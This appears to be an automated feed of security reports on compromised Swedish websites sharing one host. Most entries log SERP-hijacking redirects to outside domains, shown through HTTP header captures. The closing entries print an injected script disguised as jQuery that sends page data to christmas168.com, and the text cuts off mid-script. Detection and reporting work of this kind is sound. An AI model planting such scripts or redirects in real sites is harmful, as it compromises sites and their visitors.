Säkrare hemsida med .sehttp://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 29 Aug 2019 10:30:37 +0200<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 33833 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSCCBDARS=ANJNDNJDAIPMGILHLFLLPCIH; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 29 Aug 2019 08:30:18 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSCCBDARS=PMJNDNJDKBFDGKAAHIKAIEDM; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 29 Aug 2019 08:30:16 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net has 1 reliable address(es) for pin.se<br>Found address(es): abuse@pin.se1567150532http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 30 Jul 2019 22:38:40 +0200<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSSRBDCAD=MJBMFOMDKJMFNLHLKHMJKGKK; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 30 Jul 2019 20:38:36 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSSRBDCAD=LJBMFOMDOLCJBABDPFAANPGO; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 30 Jul 2019 20:38:34 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1564582369http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 14 May 2019 17:59:29 +0200<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCSRQSTAD=OBLIMLABEOKGNKNIDAIJCLAN; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 14 May 2019 15:59:27 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCSRQSTAD=NBLIMLABEPCNLNCHHBFOCHLG; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 14 May 2019 15:59:27 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1557920720http://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 08 Apr 2019 09:41:26 +0200<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 33833 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSQCTSSCT=IEMFIJHBBLDBNCHEBFAFNLCO; path=/ <br>X-Powered-By: ASP.NET <br>Date: Mon, 08 Apr 2019 07:41:26 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSQCTSSCT=HEMFIJHBDPBIAJLBEMLJLFHP; path=/ <br>X-Powered-By: ASP.NET <br>Date: Mon, 08 Apr 2019 07:41:26 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1554731297http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 27 Nov 2018 21:03:26 +0100<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSQCBRABD=FEEEPCFCNNLFLINEIJFHPAHE; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 27 Nov 2018 20:03:17 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSQCBRABD=EEEEPCFCBKCLAJCOFLOKKFOI; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 27 Nov 2018 20:03:17 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1543413355http://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 16 Nov 2018 07:52:45 +0100<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 32921 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDQQACSBBC=NJIFNHCDAAAHGAMGIMCCCHCA; path=/ <br>X-Powered-By: ASP.NET <br>Date: Fri, 16 Nov 2018 06:52:48 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDQQACSBBC=MJIFNHCDPAIAGIKLMMFADGJE; path=/ <br>X-Powered-By: ASP.NET <br>Date: Fri, 16 Nov 2018 06:52:46 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1542376250http://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 17 May 2018 15:57:43 +0200<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 32807 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDAQSCTAAD=ANNJIMPBOIALHCECIIFFFNAP; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 17 May 2018 13:57:39 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDAQSCTAAD=PMNJIMPBEKCCHDOOMAJHHHFG; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 17 May 2018 13:57:39 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1526630034http://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 23 Apr 2018 11:45:22 +0200<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 32807 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDASTDSBBD=GANMFOACAPGECMCNLBCFNKCA; path=/ <br>X-Powered-By: ASP.NET <br>Date: Mon, 23 Apr 2018 09:45:21 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDASTDSBBD=HNMMFOACEIKBPDCECIFHMMPG; path=/ <br>X-Powered-By: ASP.NET <br>Date: Mon, 23 Apr 2018 09:45:21 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1524491316http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 02 Mar 2018 06:38:45 +0100<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDASSCSDCA=LLAEKLGALJFKHHCBBDIHDMEC; path=/ <br>X-Powered-By: ASP.NET <br>Date: Fri, 02 Mar 2018 05:38:43 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDASSCSDCA=KLAEKLGAKGAODAOEJHMIHGBJ; path=/ <br>X-Powered-By: ASP.NET <br>Date: Fri, 02 Mar 2018 05:38:43 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1519996041http://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 13 Feb 2018 04:40:51 +0100<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 32807 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDAQSCTCCB=DNBPNIHAEAHAFHLFCODLICOI; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 13 Feb 2018 03:40:48 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDAQSCTCCB=CNBPNIHAGNFCMPPADPKIOKIB; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 13 Feb 2018 03:40:48 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1518524149http://usagi.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://usagi.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 18 Jan 2018 23:01:13 +0100<br><br>Visitors with referer are redirected to http://ajax.auowen.com/libs/jquery.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 32807 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCQRBSDCB=AKIFHPNDHEIILJEKDFDKAAMB; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 18 Jan 2018 22:01:08 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: usagi.se <br>Referer: http://www.google.com/search?q=usagi.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 159 <br>Content-Type: text/html <br>Location: http://ajax.auowen.com/libs/jquery.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCQRBSDCB=PJIFHPNDKOKIIPEICEBKBFEK; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 18 Jan 2018 22:01:07 GMT <br>Connection: close<br><br>usagi.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1516352824http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 16 Nov 2017 22:09:11 +0100<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSCSBTDAC=GMLFMDFCOBGEMNAPLPDPEABJ; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 16 Nov 2017 21:09:29 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSCSBTDAC=FMLFMDFCLLMJCLOMDHBOCEFA; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 16 Nov 2017 21:09:29 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1510923270http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 23 Oct 2017 15:16:40 +0200<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSASASBBD=PCJKFFGCCIDNHLMPKOKNBLLO; path=/ <br>X-Powered-By: ASP.NET <br>Date: Mon, 23 Oct 2017 13:16:33 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSASASBBD=OCJKFFGCFNNELGALMHHFCPEC; path=/ <br>X-Powered-By: ASP.NET <br>Date: Mon, 23 Oct 2017 13:16:30 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1508847077http://nioelva.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://nioelva.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 15 Aug 2017 23:46:51 +0200<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 3886 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSCSDTBBC=AJMHIOPABGHFHBAMBCOJJOBF; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 15 Aug 2017 21:46:48 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: nioelva.se <br>Referer: http://www.google.com/search?q=nioelva.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSCSDTBBC=PIMHIOPAAAKNHOJJPABKEEIM; path=/ <br>X-Powered-By: ASP.NET <br>Date: Tue, 15 Aug 2017 21:46:48 GMT <br>Connection: close<br><br>nioelva.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1502889375http://hjuviksmarina.se/ (81.93.152.111) - Serp-hijackingAttacked url: http://hjuviksmarina.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 20 Apr 2017 10:59:43 +0200<br><br>Visitors with referer are redirected to http://www.fapp.pw/app/se.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: hjuviksmarina.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 2760 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCSQRSQAA=NPKNKMCAGAKIGGDKIFDBEOAE; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 20 Apr 2017 08:59:41 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: hjuviksmarina.se <br>Referer: http://www.google.com/search?q=hjuviksmarina.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 150 <br>Content-Type: text/html <br>Location: http://www.fapp.pw/app/se.php <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDCSQRSQAA=MPKNKMCAHAOKLAHECGJBAACL; path=/ <br>X-Powered-By: ASP.NET <br>Date: Thu, 20 Apr 2017 08:59:41 GMT <br>Connection: close<br><br>hjuviksmarina.se is on 81.93.152.111<br>ASN for 81.93.152.111: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.111 corresponds with wsp01.web.pin.se<br>Abuse.net does not have any reliable address for wsp01.web.pin.se<br>Found address in whois: abuse@pin.se1492687363http://harborttagning.nu/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://christmas168.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>harborttagning.nu is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1467787295http://din-privatekonomi.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://christmas168.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>din-privatekonomi.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1467711710http://allt-om-turkiet.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://christmas168.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>allt-om-turkiet.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1467702834http://allt-om-turkiet.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://christmas168.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var 